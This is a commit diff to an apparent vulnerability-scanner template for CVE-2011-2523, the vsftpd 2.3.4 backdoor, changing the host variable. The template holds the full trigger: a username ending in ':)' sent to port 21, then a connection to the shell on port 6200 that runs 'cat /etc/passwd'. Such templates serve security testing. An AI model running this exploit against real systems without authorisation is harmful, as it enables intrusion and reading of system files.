Update CVE-2011-2523.yaml (#6975)

patch-1
Notealot 2023-03-28 19:22:10 +08:00 committed by GitHub
parent 93ec5c4f90
commit 4d524fd178
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 4 deletions

View File

@ -21,19 +21,18 @@ info:
variables: variables:
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
network: network:
- inputs: - inputs:
- data: "USER letmein:)\r\nPASS please\r\n" - data: "USER letmein:)\r\nPASS please\r\n"
read: 100 read: 100
host: host:
- "{{Hostname}}:21" - "{{Host}}:21"
- inputs: - inputs:
- data: "{{cmd}}\n" - data: "{{cmd}}\n"
read: 100 read: 100
host: host:
- "{{Hostname}}:6200" - "{{Host}}:6200"
matchers: matchers:
- type: regex - type: regex